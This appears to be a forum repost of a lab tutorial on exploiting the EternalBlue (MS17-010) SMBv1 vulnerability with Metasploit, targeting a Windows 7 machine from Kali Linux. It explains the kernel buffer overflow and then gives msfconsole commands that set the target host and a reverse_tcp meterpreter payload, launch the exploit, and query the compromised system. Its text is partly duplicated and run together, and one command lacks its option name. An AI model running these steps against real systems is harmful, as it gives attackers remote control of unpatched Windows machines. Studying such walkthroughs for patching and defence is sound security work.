personstom
High Performance Computing Expert
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
This module is a port of the Equation Group ETERNAL BLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memory operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with a mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original, may not trigger 100% of the time and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.
Let’s start!!!
Attacker: Kali Linux
Target: Window 7
Open the terminal in your Kali Linux type msfconsole to load Metasploit framework.
From the screenshot, you can see we have got a meterpreter session after buffer overflow exploited by overwriting SMBV1 buffer.
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
Let’s start!!!
Attacker: Kali Linux
Target: Window 7
Open the terminal in your Kali Linux type msfconsole to load Metasploit framework.
Code:
msfconsole
Code:
Use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8
msf exploit(ms17_010_eternalblue) >set 192.168.1.21
msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) >exploitFrom the screenshot, you can see we have got a meterpreter session after buffer overflow exploited by overwriting SMBV1 buffer.
Code:
meterpreter> sysinfoAuthor: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here